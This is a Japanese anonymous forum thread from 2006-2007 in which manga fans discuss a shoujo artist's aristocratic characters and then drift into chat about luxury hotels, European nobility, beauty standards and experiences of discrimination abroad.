140 :花と名無しさん:2006/12/28(木) 18:01:02 ID:???O
あの二人は元に戻るんだろか。

僕と彼女の×××もまだ連載途中だけど男女入れ替えモノは
最後は元に戻るのが定石?
戻らないでほしい。

141 :花と名無しさん:2006/12/28(木) 19:36:54 ID:???0
黒ふきだしのページの柱の解説、わざと?

142 :花と名無しさん:2006/12/28(木) 23:30:07 ID:???0
桜小路家の女中さん姓が大金だったりして

143 :花と名無しさん:2006/12/29(金) 21:59:31 ID:???0
フラワーズ、読める部分が減っちゃって…
季刊でいいからまともな書き手をそろえて欲しいなあ。
今月号、読めたのは名香さんと吉野さんだけだよ…

144 :花と名無しさん:2006/12/31(日) 21:08:04 ID:1z+AkDOvO
>>143
私は名香さんと奈知さんだけだった…

145 : 【吉】 【1623円】 :2007/01/01(月) 19:42:14 ID:???0
早く続きが読みたい、後編が楽しみ。

146 : 【凶】 【407円】 :2007/01/01(月) 22:43:03 ID:???0
でもシャルトルの続きは読みたい・・・

147 :花と名無しさん:2007/01/02(火) 05:38:20 ID:???O
アテネーとリオンのその後が読みたいなあ
アンリとフランツのその後も気になる〜

148 :花と名無しさん:2007/01/03(水) 04:07:19 ID:???O
ミカエルとソフィーの双子の子にフィリップとクラウディアが翻弄されちゃったりして。
リオンとアテネーの子がそうなったら切な過ぎるな…

149 :花と名無しさん:2007/01/03(水) 09:40:40 ID:???0
一度はヴィラ・デステに泊まってみたいな〜と思ったけど、庶民な上に日本人なんて相手にもされないんだね・・・

150 :花と名無しさん:2007/01/05(金) 03:04:34 ID:???O
そこで勘違いしてる奴らを凹ませるのは
蘭子さんでも無理?
蘭子って貧乏華族の出身だったっけ?

151 :花と名無しさん:2007/01/05(金) 09:36:28 ID:???0
ヴィラ・デステについてググると、泊まった方の感想を書いたブログがありまして
それを読む限り、いくら金があっても湖面側のスイートには泊まれそうにもない・・・
欧州貴族の愛人にでもならない限りたぶん無理。

152 :花と名無しさん:2007/01/05(金) 13:24:12 ID:???0
>>151
普通にヴィラ・デステの湖面側のスイートに泊まった人のブログもありましたよ?

医者だったけど。

153 :花と名無しさん:2007/01/05(金) 20:42:01 ID:???0
医者と言ってもピンキリw

五つ星ホテルで、日本人が粗末な扱いになりがちなのはなんとなく想像つく。
一見さんお断りではないけど、後回し状態。
旅行代理店経由だとナメられるとか?

154 :花と名無しさん:2007/01/05(金) 21:30:03 ID:???0
なんにしろ「泊まってみたい」っていうだけならお金があれば
(待たされたりはしても)なんとかなるんじゃないの。

155 :花と名無しさん:2007/01/05(金) 22:48:50 ID:???0
高級リゾートホテルだから、毎年行く常連でスイートの予約はほとんど埋められていそうだね


156 :花と名無しさん:2007/01/05(金) 22:59:01 ID:???0
>>153
どこやら病院の理事長だかなんだかだった>医者
気になるのなら アンチエイジングブログ ヴィラ・デステでググってみては?
ステイを十分堪能したようですよ。

157 :花と名無しさん:2007/01/05(金) 23:30:08 ID:???0
>>156
d

10年前だから教授を退職した年か。
退職金ウハウハ・・・ゲスなことしか考えられないw

やはりこのクラスレベルの人ではないと、五つ星スイートでは相手にされないのだろうな〜

158 :花と名無しさん:2007/01/06(土) 17:49:24 ID:???0
今ウィーンフィルニューイヤーコンサート(再)を見ているだけど
美しく青きドナウが左回りのワルツでちょっといいもの見たカンジ。バレエだけど。

159 :花と名無しさん:2007/01/09(火) 10:13:12 ID:???0
海外板読んでると黄色人差別が多すぎて鬱になる。
やっぱり今度生まれ変わったらシンシアのような長身の美人になりたい。
ところでシンシアって身長いくつだっけ?

160 :花と名無しさん:2007/01/09(火) 11:55:31 ID:???0
でも、シンシアだってアフリカで敬遠されてるよ。

英国は上流階級とその他の階級で平均身長が何センチも違うと聞いた。
シンシアは175センチくらいなのかな。

161 :花と名無しさん:2007/01/09(火) 22:34:53 ID:???O
金髪率も高くなるって聞いたことある。

162 :花と名無しさん:2007/01/09(火) 22:55:51 ID:???0
でも生粋のスペイン貴族は男でも身長が150センチ代と
なんかの小説で見たことあるなー。

163 :花と名無しさん:2007/01/10(水) 16:53:37 ID:???0
金持ちは美形が多いって聞いたことある。

164 :花と名無しさん:2007/01/10(水) 20:05:36 ID:???0
>>163
いくらなんでもそれはw
身だしなみや立ち居振る舞いが洗練されてて
貧乏人よりイケメンに見えるってだけじゃまいか。

165 :花と名無しさん:2007/01/10(水) 20:26:42 ID:???O
金持ちや貴族が必ずしも美形と結婚できるわけじゃないし、
一族みな生れつき美形というのは難しそう。
一般人なら顔で選べても、ああいう人達って制約も多いだろーし。
ただ金にあかせていくらでも整形やお手入れができるのはうらやましい

166 :花と名無しさん:2007/01/10(水) 22:42:33 ID:???0
日本の貴族をよく思い出してよw

167 :花と名無しさん:2007/01/10(水) 22:57:12 ID:???0
日本の貴族は昔の美形顔だったんだよ!
マジに。

168 :花と名無しさん:2007/01/10(水) 23:42:23 ID:???0
昔の基準だろw

169 :花と名無しさん:2007/01/10(水) 23:57:18 ID:???0
美の基準は時代や国で変わるんだから昔はそれが美だった
ってことでしょ。
なんにしろ身分が高くてお金があれば生まれつきの外見が
多少難があっても栄養状態はいいだろうから庶民よりは
垢抜けて見えたろうな。

170 :花と名無しさん:2007/01/11(木) 00:51:24 ID:???0
名香さんの美形の幅広さが好きだが、
最近の不細工のひどさもすごい。

171 :花と名無しさん:2007/01/11(木) 08:52:44 ID:???0
名香さんの美形キャラは顔が面長だよね。

172 :花と名無しさん:2007/01/12(金) 23:23:02 ID:???0
ギネヴィアのパパと、シンシアのパパを比べると、
シンシアさんちの方が厳格なイメージなのだが、
ギネヴィアパパの方が格上の貴族さまなのか。


173 :花と名無しさん:2007/01/13(土) 04:41:23 ID:???0
今回の男女入れ替わる話、微妙だなぁ。
嫌いじゃないんだけど、やっぱり昔の短編に比べると
「ハイセンス」じゃないというか、キレが無いというかシャープさに欠けるというか…。

174 :花と名無しさん:2007/01/13(土) 09:52:51 ID:???0
>>172
パッと見、どっちも同じ顔に見える

175 :花と名無しさん:2007/01/13(土) 23:54:30 ID:???0
鼻の下をのばして、ユーリエの胸の谷間をのぞきこむアーサーパパ
シンシアパパは娘の胸の谷間にも動じない

176 :花と名無しさん:2007/01/19(金) 21:29:41 ID:???0
パリスは、アフロディーテを選んだ。
アネモネは、アフロディーテが手放さなかった美少年アドニスの流した血から生まれた。

177 :花と名無しさん:2007/01/19(金) 22:33:24 ID:???0
>>175
そりゃ赤の他人と自分の娘じゃ違って当たり前田

178 :花と名無しさん:2007/01/19(金) 22:37:52 ID:???0
ギネヴィアには、平常時は、胸の谷間が存在しなかったしなぁ。

179 :花と名無しさん:2007/01/20(土) 12:12:26 ID:???0
>>178
そこがまたステキ

180 :花と名無しさん:2007/01/23(火) 23:41:11 ID:???O
ヴィスはギネヴィアより平らなんだろうなぁ。

今連載中の話、日本人伯爵(?)のおかん、正直怖い。
あの時代のお嬢様→貴族夫人は跡継ぎを産めば上出来なのだろうが。
自分でパトロンを見つけるとか全然考えてない感じ。
あどけない残酷さというか…

ヴィスがあの境遇になったら、アンリを売っちゃうのかな?

181 :花と名無しさん:2007/01/23(火) 23:50:46 ID:???0
>180
趣味と実益を兼ねて、ジゴロになるに1票〜
はたして成功するのだろうか?

182 :花と名無しさん:2007/01/24(水) 10:34:40 ID:???0
伝説レベルで成功すると思う
シュニーユの太鼓判付き

183 :花と名無しさん:2007/01/24(水) 18:10:42 ID:???0
よしながふみがメロディに連載している「大奥」の中で、
江戸時代の公家の三男坊が出家するも江戸で還俗させられた時に
実家の父が届けられた金に大喜びした・・・父上は決して悪いお方やないけど
そういう所のあるお方やよって・・・というのを思い出してしまって・・・
お公家様ってそういうイメージなのかな? スレ違い失礼しました。

イギリスの貴族令嬢って、日本人のこと黄色い猿ぐらいにしか
思わなそうだが・・・フランス人はその辺偏見は少なさそう
・・・それこそ偏見?

184 :花と名無しさん:2007/01/24(水) 20:52:46 ID:???0
フランス人は自国至上主義らしいからねぇ・・・。偏見強いらしいよ
勿論、違う人もいるだろうけど。

友達夫婦(夫・フランス人、妻・日本人)がとある雑貨店に買い物に行ったら
旦那さんの方には愛想良くちゃんと対応するのに、奥さんが質問・注文しても
まるっきり無視だったって。
旦那さんの方が、すごく悔しそうに話したのを覚えてる。


185 :花と名無しさん:2007/01/24(水) 21:31:06 ID:???0
>>184
いい旦那さんだな…ノロケだなw

186 :花と名無しさん:2007/01/25(木) 00:13:14 ID:lwiPjz2NO
日本の浮世絵→漫画は素晴らしい!(柔軟な美意識)だったり、
西ヨーロッパ一の農業国(自国の食べ物が一番美味いぞ!)だったり。
幅が広いのだろうなぁ。

>>176 考えたら、自分が赤髪で「朱美」とか名付けられたらかなり嫌。

そういう意味で気になるのは、
アーサー王と王妃ギネヴィア。
騎士ランスロットとの不倫疑惑は詳しく知らないけど、
娘に普通名付けるかな…
実際見たことないなぁ。ギネヴィアさん。

40 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)